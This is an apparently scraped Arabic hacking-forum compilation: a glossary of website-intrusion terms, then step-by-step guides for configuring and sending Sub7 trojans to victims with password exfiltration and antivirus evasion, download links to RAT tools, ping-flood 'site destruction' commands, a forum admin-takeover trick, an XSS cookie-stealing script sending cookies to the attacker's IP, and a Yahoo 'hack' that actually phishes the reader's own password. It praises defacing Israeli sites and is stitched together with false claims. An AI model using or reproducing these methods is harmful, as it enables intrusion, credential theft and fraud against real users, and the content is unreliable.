خدمات معلومات الانترنت وهي تأتي مع الويندوز الخاص بالسيرفرات...وسأوضح ماهو IIS بالتفصيل لاحقاً...
----------------------
APATCH: وهذه الكلمة أيضاً مشهورة بيننا...وتعريفه أنه برنامج يعمل على اجهزة سيرفرات بنظام
تشغيل اسمه Solaris...أيضاً سأوضح ماهو APATCH لاحقاً...
----------------------
Root: هذا هو أقوى مستخدم في نظامي التشغيل Unix و Linux...لا تستعجل ستعرف كل شيء...
----------------------
PHP: وهي اختصار لـ Personal Home Page tools وهي لغة برمجة تستخدم لتطوير مواقع الويب وإنشائها...
وقدأنشأها شخص يدعى راسموس ليدروف عام 1994م.
----------------------
CGI: وتعني COMMON GATEWAY INTERFACE وهي الواجهة التي تسمح بالاتصال بين جانب المستخدم عن طريق
المتصفح أو البرامج وخلافه,وجانب الويب سيرفر الذي يفهم البروتوكول (HTTP) .
----------------------
ANONYMOUS: مجهول,وهو المتحكم او المستخدم الاساسي وهو اول رتبة في تحكم بروتوكول FTP .
----------------------
Ping: من أشهر المصطلحات وهي عبارة عن حزمة بيانات ترسل لشيء ما والمطلوب هو معلومات
عن الشيء المرسل إليه...وهناك أدوات وبرامج خاصة بالـPing لكن يظل الدوس هو أشهر هذه الأدوات...
----------------------
الكاتب : زائر
مصطلحات مهمة للمبتدئين في تعلم اختراق المواقع
السلام عليكم
لقد اعددت هذا الملف لاخواني المبتدئين في تعلم طرق اختراق المواقع ، فقد
تواجههم بعض الكلمات التي قد تكون غريبة عليهم و التي قد لا يفهمونها ،
و بالتالي تشكل لهم بعض العواقب في مواصلة الفهم و التعلم . فالله الموفق.
=============================
تلنت (Telnet):-
و هو برنامج صغير موجود في الويندوز . و هو يعمل ككلاينت
أو وضعيته تكون دائما كزبون . أي أن باستطاعة هذا البرنامج الإتصال بالسيرفر
أوالخادم و اجراء بعض العمليات كل حسب مستواها و حالتها . يستخدمه الهاكرز
غالبا لمعرفة نظام تشغيل الموقع و السيرفر التابع له ، و للإتصال بالسيرفر
عبر بورت معين و خصوصا بورت الإف تي بي (21) للدخول الى الموقع بطريقة خفية
Anonymous Mode لعرض ملفات الموقع و سحب ملف الباسورد او غيره من البيانات.
لاستخدام البرنامج ، اذهب الى Start ==> Run ==> telnet و ستظهر شاشة التلنت.
-------------------------------------------------------------------------
برامج السكان أو Scanner:-
و هي برامج موجودة للمسح على المواقع و كشف
ثغراتهاإن وجدت ، فهي سريعة، كما أنها تملك قاعدة بيانات واسعة و كبيرة
تحتوي على الثغرات أو الاكسبلويت (Exploits) التي يتم تطبيقها على الموقع
لرؤية فيما اذا كان السيرفر يعاني من احدى هذه الثغرات أم لا . و من أمثلة
هذه البرامج، برنامج Shadow Security Scanner و Stealth و Omran Fast
Scanner ، الخ .
و لهذه البرامج أنواع مختلفة ، منها التي تقوم بعمل سكان على نظام أو سيرفر
معين مثل البرامج المختصة بالسكان على سيرفرات الـ IIS و منها برامج المسح
على ثغرات السي جي اي فقط CGI و ما الى ذلك .
------------------------------------------------------------------------
اكسبلويت (Exploits):-
هي برامج تنفيذية تنفذ من خلال المتصفح . و لها عنوان
URL ، تقوم هذه الإكسبلويتات بعرض ملفات الموقع و تقوم بعضها بالدخول الى
السيرفر و التجول فيه ، كما توجد اكسبلويتات تقوم بشن هجوم على بورت معين
في السيرفر لعمل كراش له ، و هذا ما يسمى بـ Buffer Over Flow Exploits .
هناك أنواع من الإكسبلويت ، فمنها ال CGI Exploits أو ال CGI Bugs و منها
ال Unicodes Exploits و منها ال ، Buffer Over Flow Exploits ، و منها
ال PHP Exploits ،و منها الDOS Exploits و التي تقوم بعملية حجب الخدمة
للسيرفر إن وجد فيها الثغرة المطلوبة لهذا الهجوم و ان لم يكن على السيرفر
أي فايروول Fire Wall . و هناك بعض الإكسبلويتات المكتوبة بلغة السي و يكون
امتدادها (.c) .
هذه الإكسبلويتات بالذات تحتاج الى كومبايلر او برنامجا لترجمتها و تحويها
أي الاكسبلويت الى اكسبلويت تنفيذي عادي يستخدم من خلال المتصفح ، و لتحويل
الإكسبلويت المكتبو بلغة السي هذه الى برنامجا تنفيذيا ، نحتاج إما الى
نظام التشغيل لينوكس او يونكس ، او الى اي كومبايلر يعمل ضمن نظام التشغيل
ويندوز . أشهر هذه الكومبايلرات ( المترجمات أو المحولات ) برنامج اسمه
Borland C++ Compiler و هي تعمل تحت نظام التشغيل ويندوز كما ذكرنا سابقا.
-----------------------------------------------------------------------
الجدار الناري FireWall:-
هي برامج تستعملها السيرفرات لحمايتها من الولوج
الغير شرعي لنظام ملفاتها من قبل المتطفلين . هي تمثل الحماية للسيرفر طبعا ،
و لكني أنوه بأن الفايروولات المستخدمة لحماية السيرفرات ( المواقع ) تختلف
عن تلك التي تستخدم لحماية الأجهزة .
-----------------------------------------------------------------------
Anonymouse:-
هي الوضعية الخفية و المجهولة التي تدخل فيها الى الموقع المراد
اختراقه. هناك خاصية في برامج الاف تي بي بنفس الإسم ، تستطيع ان تستعملها
في الدخول المجهول الى السيرفر و سحب الملفات منه .
-----------------------------------------------------------------------
Valnerableties:-
أي الثغرات أو مواضع الضعف الغير محصنة أو القابلة للعطب
و التي يعاني منها السيرفر و التي قد تشكل خطرا أمنيا عليه مما يؤدي الى
استغلالها من قبل الهاكرز في مهاجمة السيرفر و اختراقه أو تدميره .
ما هي مفردها ؟ ، Valnerable أي ثغرة أو بالأصح موضع الضعف و المكان
الغير مؤمن بشكل سليم . و تكثر هذه الكلمة في القوائم البريدية للمواقع المهتمة
بالسيكيوريتي و أمن الشبكات و غيرها كالقائمة البريدية الموجودة في موقع
Security Focus أو بوق تراك او غيرها .
-----------------------------------------------------------------------
passwd file :
هو الملف الذي يحتوي على باسورد الروت و باسوردات الأشخاص
المصرح لهم بالدخول الى السيرفر . باسورد الموقع موجود في نفس الملف طبعا.
-----------------------------------------------------------------------
الجذر أو الـ root :
و هو المستخدم الجذري و الرئيسي للنظام ، له كل الصلاحيات
في التعامل مع ملفات الموقع و السيرفر من إزالة أو اضافة أو تعديل للملفات.
غالبا ما يكون باسورد الروت هو باسورد الموقع نفسه في المواقع التي تعمل ضمن
نظام التشغيل لينوكس او يونكس و سولاري و فري بي اس دي و غيرها .
-----------------------------------------------------------------------
السيرفر Server:
هو الجهاز المستضيف للموقع ، اذ أن كل ملفات الموقع توضع فيه
فهو جهاز كمبيوتر عاد كغيره من الأجهزة لكنه ذو امكانيات عالية ككبر حجم القرص
الصلب و سرعته الهائلة ، و هو متصل بالإنترنت 24 ساعة ، و هذا هو سبب كون
المواقع شغالة 24 على الإنترنت . قد يملك و يستضيف السيرفر أكثر من موقع
واحد، و هذا يعتمد من سيرفر لآخر و من شركة لأخرى. ضربة الهاكرز طبعا هي اختراق
السيرفر الذي يملك الكثير من المواقع ، فيسهل حينها اختراق جميع المواقع التي
تندرج تحته مما يؤدي إما الى تدميرها أو العبث في ملفاتها أو تشويه واجهتها أو
سرقة بياناتها و تدميرها أو مسحها من النت تماما ، و هذا ما يحدث للمواقع
الإسرائيلية و بكثرة و لله الحمد . - جزاكم الله خيرا أيها المجاهدون - .
------------------------------------------------------------------------
بوفر أوفر فلو ( Buffer over Flow ) :
و هي نوع من أنواع الاكسبلويتات التي
تستعمل لشن هجوم الطفح على نقطة معينة من السيرفر مثل الهجوم على بورت الإف تي بي
أو غيره لأجل اضعاف اتصال السيرفر و فصل اتصاله بهذا بهذا البورت و لالغاء الرقعة
الموجودة بها كي يتم استغلالها مجددا - بعد عمل الكراش لها طبعا - يتم استغلالها
في معاودة الإتصال لها و بسهولة و دون وجود أي رقع او حواجز و سحب البيانات منها .
و هي شبيهة نوعا ما بعملية حجب الخدمة - DOS - اذ أنها تقوم بعملية اوفر لود على
جزء مركز من السيرفر
طريقة اختراق الاجهزة من الصفر حتى الأحتراف
سوف ينقسم الدرس الي إحدى عشرة نقطة :-
1- مقدمة عن الهكرز.
2- أقسام هكرز الأجهزة.
3- برنامج الهكرز.
4- المنفذ (Port).
5- الأي بي (IP).
6- البرامج الاكثر أستخداما .
7- بعض برامج الهكرز وشروحاتها
8- ميكانيكية الاختراق .
9- طرق الحماية من الهاكرز معرفة اذا كان جهازك مصاب بملف تجسس أم لا
10- معرفة أذا كان جهازك قد تم أختراقه
11- عدم كشف السيرفر من الانتي فايروس
11- ملاحظات ومعلومات عامة.
12- النهاية.
والآن نبدأ الشرح
1- مقدمة عن الهكرز:-
الهكرز هم أشخاص أصلا مبرمجين محترفين طوراا قدراتهم وأصبحوا يستطيعون التسلل الي الأجهزة والمواقع وغيرهاا وأسمهم بالعربي مخترقون أو متسللون أما الانجليزي وهو الشائع الكتابة بنطقه بالعربي هو (Hackers)
##################################################
##2- أقسام الهكرز:-
الهكرز ينقسمون الي ثلاث أقسام (طبعاا هكرز الاجهزة)
أ- المبتدىء : وهو أخطر أنواع المخترقين لأنه يريد تجربة كل ما تعلمه وغالبا ما
يحب التدمير وتخريب الاجهزة
ب- الخبير: وهذا لاخوف منه لأنه يخترق الاجهزة فقط للبحث فيهاا و أخذ ما يعجبه منها
ج- المحترف: وهو يجمع الأثنين معاا فأولا يأخذ الأشياء التي يريدها من جهاز الضحية وبعدهاا يقوم بتدميره
##################################################
3- برنامج الهكرز:-
كل برنامج هكرز ينقسم الى ثلاث أقسام وهي
أ- ملف البرنامج الرئيسي وهو الذي من خلاله سوف تقوم بأختراق جهاز الضحية
ب- ملف التجسس (Server) وهو الملف الذي يقوم بأكبرجزء في الأختراق ولا أنصحك بفتحه
ج- أعدادات ملف التجسس أو ((Edit Server)) ومن خلاله تقوم بصنع ملف التجسس والذي سوف ترسله الي الضحية
##################################################
#
4- المنفذ (Port):-
وأتوقع أنه مفهوم من من نفس الكلمة فهو منفذ يصل بينك وبين الضحية عن طريقه يتم أختراق الضحية ونقل الملفات من الى أمثلة على المنافذ:-
8080
25
26
12
6588
80
وغيرها
##################################################
##
5- الأي بي (IP)
وهو أهم شيء في أختراق الاجهزة ولا يتم الأختراق ألا به وتستطيع معرفة الأي بي الخاص بك من
أ- أبدأ
ب-تشغيل
ج- أكتب الامر winipcfg
ستفتح نافذة أمام الكلمة "عنوان IP " ستجد أرقام مكتوبة مكونة من أربع أجزاء هي الأي بي الخاص بك كل جزأ يدل على شيء فالجزء الاول يدل على مكان الأقامة والجزء الثاني أو الثالث يدل على مزود خدمة الانترنت ويجب أن تكون على الانترنت حتى يظهر الاي بي الخاص بك أما أذا لم تكن على الانترنت فسوف يظهر لك أصفار.
##################################################
##
- البرامج الالكثر أستخداما:-
ينتشر في العام العربي عدة برامج هكرز ومن أكثرهاا أنتشارا السب سفن (Sub7) لسهولة أستخدامه وكثرة الميزات التي به من المرحة والمرعبة ومبرمجه هو الهكر الكبير كيفن ميتنك لكن ذالك لا يعني أنه الاقوى .
ويوجد بعض البرامج الاخرى مثل الهاك أتاك والنت بص والديب ثرو ولكن أستخدامهم قليل.
أما عن أقوى برنامج هكرز فهو الباك أوورفايس ولكن لا يستخدمه ألا الخبراء المحترفين لصعوبة أستخدامه وتعقيده ولكنه أقوى البرامج مع شهادة أكبر الهكر
##################################################
#######
7- بعض برامج الهكرز وشروحاتهاا:-
وهو أكبر جزء في الدرس و سوف أقوم بشرح السب سفن 2.2 لأنه أسهل برنامج على المبتدئين طبعاا ولكن ليس البرامج أنما أعدادات السيرفر لأنه البرنامج عربي ولا يحتاج لشرح
وصلة البرنامج http://www.s7a.netfirms.com/t3reb2.2.zip
بعض البرامج
جميع اصدارات سب سفن في هذا الموقع
http://www.sub7.net/downloads.shtml
ملف تعريب آخر اصدار الطريقة مرفقة مع الملف http://www.s7a.netfirms.com/t3reb2.2.zip
---------------------------------------
اصدارات نت بص
http://portwolf.hack3r.com/zips/netbusfirst.zip
http://portwolf.hack3r.com/zips/netbus1.2.zip
http://portwolf.hack3r.com/zips/netbus1.53.zip
http://portwolf.hack3r.com/zips/netbus1.6.zip
http://portwolf.hack3r.com/zips/netbus1.7.zip
http://portwolf.hack3r.com/zips/netbus2.0.zip
http://portwolf.hack3r.com/zips/nbpro201.zip
--------------------------------------
اصدارات الباك اورفيس
http://portwolf.hack3r.com/zips/backorifice.zip
http://portwolf.hack3r.com/zips/bo2k.zip
http://portwolf.hack3r.com/zips/boclient.zip
-------------------------------------
ديب ثروت 3
http://portwolf.hack3r.com/zips/deepthroat3.zip
------------------------------------------------
ديب ثروت
http://portwolf.hack3r.com/zips/deepthroat.zip
-------------------------------------------------
شرح أعدادات السيرفر (Edit Server)
1-بعد تحميل البرنامج وفك ضغطه سوف تجد ثلاث أجزاء البرنامج الاساسي السيرفر وإديت سيرفر كما ذكرت
2- إضغط على Edit server
3- ثم إضغط على run in normal mode
1- أمام كلمة port اكتب البورت 27444
2- أمام كلمة password ضع الرقم السري الي تبيه
وأمام كلمة re –enter password كرر نفس الباسورد الي كتبته
3-أمام كلمة protect password اكتب الي رقم وينفع يكون نفس الباسورد الاول وتحته كرر الباسورد نفسه
علشان ما أحد يخترق الضحية من خلال السيرفر الا أنت
4- ضع علامة صح أمام الجملة melt serverafter installatoin
4- انتقل الى الخيار startup methods
ضع علامة صح أمام العبارتين win .ini
و system.ini
5- إنتقل الى الخيار notifications
وإضغط على add e-mail notify وأكتب ايميلك علشان أول مايدخل الضحية الى النترنت تأتيك رسالة على
اليميل تخبرك بأن الضحيه
دخل النترنت ومعاها الاي بي والبورت
واضغط على الخيار binded files وإضغط على الكلمة add executed file وأرفق السيرفر مع أي ملف
تريد
انتقل الى الخيار e-mail وضع صح أمام الجملة e-mail all passwords to وأكتب أسم اليميلك علشان
تجيك رسالة الى اليميلك
تخبرك أن الضحية دخل النترنت
انتقل الي الخيار exe icon / other وضع علامة صح أمام الجملة change server icon وإختار الشكل
الي تبي لأيقونة سيرفرك
وأخيرا إضغط على كلمة save as… وضع السيرفر في أي موقع في جهازك
وبعدين أرسله على الضحية وبعد أن يفتحه سوف ترسل لك رسالة على الايميل الذي وضعته في السيرفر وفيها
الاي بي والبورت تبعات الضحية
وبكذا تكون قد أنتهيت من آخر شيء لازم لعملية الاختراق
##################################################
#######
8- ميكانيكية الأختراق:-
بعد صنع السيرفر تقوم بأرساله للضحية إما عن طريق الايميل وأما عن طريق الماسنجر وغيرها ويجب على الضحية فتحه وبعد فتحه ترسل لك الأي بي والبورت على الايميل ومن ثم تأخذهم وتضعهم بالبرنامج وتسوي كونكت وتمتع بالاختراق
##################################################
#######
9- طرق الحماية من الهاكرز:-
يوجد طرق كثيرة للحماية من الهكرز ومن هذه الطرق الحماية عن طريق البرامج والحماية الذاتية أما الحماية عن طريق البرامج فيجب أن يتوفر نواعان من البرامج وهي برامج الحماية من ملفات التجسس والحماية من محاولات الاختراق وهي برامج كثيرة منهاا
" ذا كلينر" و" نورتن أنتي فايروس وهو يحمي من الفايروسات والباتشات " و " الوك داون " و " الزون آلارم " وغيرها الكثير ولكن لم أذكر ألا أفضلها وأشهرها.
أما الحماية الذاتية فهي صعبة قليلا ولكن أفضل وسوف تفيدك جداا وهي تعتمد على البحث علن ملف التجسس وأزالته
ومن طرقهاا
الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :
1- أنقر على إبداء Start
2- أكتب في خانة التشغيل Run الأمر : rigedit
3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
- HKEY_LOCAL_MACHINE
- Software
- Microsoft
- Windows
- Current Version
- Run
4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete
--------------------------
الطريقة الثانية بواسطة الأمر :msconfig
1- انقر ابداء Start
2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.
--------------------------
الطريقة الثالثة بواسطة الدوس Dos:
هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
1- إفتح الدوس من محث MSDos بقائمة إبداء
2- أكتب الأمر التالي : C:/Windowsdir patch.*
3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
C:Windowsdelete patch.*
##################################################
######
10- معرفة أذا كان جهازك قد تم أختراقه أم لا :-
طبعا ليس قد تم أختراقه ولكن يتم أختراقه وطبعاا تعرف ذالك وأنت على الانترنت ببعض الخطوات وهي:-
أ- أبدأ
ب- تشغيل
ج- أكتب الامر System.ini
سوف تفتح معك مفكرة أنظر الي السطر الخامس أذا كان بجانبه ***** نجوم فأذاا أنت مخترق والطريقة مش دائما لأنها تكون حسب أعدادات السيرفر فممكن يحطها تدخل في السستم
الطريقة الثانية:-
طبعاا بعد الدخول في الانترنت سوف ينزل لك في الزاوية بجانب الساعة كمبيوترين أخضرين قم بفتحهم أذا رأيت أن البايت المرسلة أكثر من البايت المتلقاه فأذا أنت مخترق
##################################################
#######
11- عدم كشف السيرفر من الانتي فايروس :-
تقوم فكرة عدم كشف السيرفر من الانتي فايروس على دمج السيرفر مع أي شيء وأفضل برنامج يقوم بهذا برنامج المحرر وهو عربي
وصلة البرنامج http://www.mypage.ayna.com/mimi3/mohrar.zip
شرح البرنامج
نزل البرنامج و فك الضغط
انسخ كل من السيرفر و الصورة في نفس ملف المحرر
افتح ملف المحرر
اضغط على السيرفرو اختر السيرفر
اضغط على الطعم و اختر الصورة
اضغط إبدأ بتكوين السيرفر
عندها سيتكون صورة في نفس ملف المحرر باسم IslamicFile
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
طريقة من طرق تدمير المواقع
من برنامج الدوز حط الامر هذا
ping http://zzzzzzzzt مثال1
بدل الأكسات اكتب اسم الموقع
ping http://www.EXR.com مثال2
--------------------------------------------
طريقة من طرق تدمير المواقع بلايبي
من قائمة ابدء اختار تشغيل وحط الامر التالي
ping الايبي -ttt مثال1
ping 202.99.166.34 -ttt مثال2
طريقه لاختراق المنتديات
السلام عليكم ورحمه الله وبركاته
طريقة اختراق المنتديات ((( سهل جدا )))
هذه طريقة سهلة لاختراق المنتديات
.
1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
URL = العنوان المستضيف للمنتدى
مثل = israel.org
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
والحين ماشاء الله عليك صاير مدير>>>> الدجه
قبل كل شي اذا جيت تد خل على موجة الدوس لا زم تكتب في مفتا ح التشغيل ها الا مر > command
طريقة الحصول على رقم الا ي بي تبع الموقع : تكتب الا مر هذا ....
ping_www.tash2003.com بس يطلع لك الا ي بي تبع الموقع بين قوصين .
======================================
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
======================================
بسم الله الرحمن الرحيم ..
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
script>document.write('
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
انا بأديكم كيف تخترق الياهو من دون برامج
افتح ماسنجر الياهو
قم بادخال بريدك وكلمة السر
سوف تجد في الاسماء المدرجين الذي قمت بادراجهم لديك خادم الياهو او مساعد الياهو
YahooHelper
وهاذا الخادم يكون متصلاً طيلة استخدامك للماسنجر
اضغط علية وسوف ينفتح لك مربع الحوار
اكتب الية في مربع النص الموجود في الاسفل
مايلي بالضبط
البريد الذي تريد سرقتة
من دون اي مسافات اطلاقاً هاكذا ثم نقطة ثم كلمة باسورد بالانكليزي password
yahoo.com.password@??????
ثم اضغظ
Enter
انتظر ......
ستاتي اليك رسالة ترحيبية ولطلب اي مساعدة طنشها
بعد وصول الرسالة اكتب الية في مربع النص
مايلي بالضبط دون اي مسافات
بريدك مع الخادم ثم نقطة ثم كلمة HELP
هاكذا
yahoo.com.HELP@???????
ثم اضغظ
Enter
انتطر لوصول رسالة
بعد وصول رسالة من الخادم قم بتسكير مربع الحوار او صندوق الحوار
بواسطة علامة الاكس الموجودة في الجة اليمنى العليا
الان ماذا تعمل
اذهب فورا الي الصفحة الرئيسية في الماسنجر وستجد زر
Massage
الموجود ة في اعلى الصفحة من الجهة اليسرى تحته كلمة add اتركها وسوف تجد بجانبها
كلمه Im
اظغط عليها
سينفتح لك مربع حوار فية مربع نص صغير موجود في الاعلى بجانب
To
اكتب فيه
alshaarey
ثم في مربع النص الموجود في الاسفل اكتب كلمة السر الخاصة بك يليه نقطة
هاكذا
.؟؟؟؟؟؟؟ ثم enter
حيث علامة ؟ هي كلمة السر الخاصة بك التي تستخدمها حاليا في الماسنجر
وبعد كتابة كلمة السر خاصة بك اغلق مربع الحوار وسوف تصلك رسالة خلال ساعة الي صندوق بريدك تحتوي فقط على كلمة السر الخاصة بالبريد الذي قمت بطلب سرقتة .
الرجاء الدقة في الطريقة لكي تتم العلميةبشكل صح
اتمنى ان يكون الشرح موضح
لاكن انا والله لم اشرح الموضوع بلصورة لانى مشغول جداا
اتمنى ان اكون وفيت
0 التعليقات: